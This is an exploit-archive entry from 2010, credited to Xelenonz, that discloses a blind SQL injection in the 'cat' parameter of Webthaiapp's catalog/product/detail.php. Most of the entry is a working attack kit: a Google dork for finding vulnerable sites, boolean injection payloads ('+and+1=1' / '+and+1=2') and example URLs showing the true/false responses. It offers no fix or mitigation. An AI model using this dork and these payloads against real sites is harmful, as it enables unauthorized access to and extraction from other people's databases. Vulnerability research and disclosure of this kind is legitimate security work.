Webthaiapp detail.php(cat) Blind Sql injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Webthaiapp detail.php(cat) Blind Sql injection Vulnerability
# Published : 2010-04-30
# Author : Xelenonz
# Previous Title : Puntal v2.1.0 Remote File Inclusion Vulnerability
# Next Title : Alibaba Clone Platinum (offers_buy.php) SQL Injection Vulnerability

--==+==================================================+==--

--==+             Webthaiapp detail.php(cat) Blind Sql injection 
Vulnerability                +==--

--==+==================================================+==--

Date : 30-04-2010

-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

AUTHOR: Xelenonz

Homepage : www.thaishadow.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=

Application : Webthaiapp

Vendor      : http://www.Webthaiapp.com/

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

DORK (google): "inurl:catalog/product/detail.php?cat="

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

DESCRIPTION:

EXPLOITS:

detail.php?cat=[valid catid]+and+1=1   << TRUE

detail.php?cat=[valid catid]+and+1=2  << False

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Example

http://server/catalog/product/detail.php?cat=44+and+1=1  
<< True

http://server/catalog/product/detail.php?cat=44+and+1=2 
<< False

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Special Thx : Krit admin@thaishadow,Thaishadow.com

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=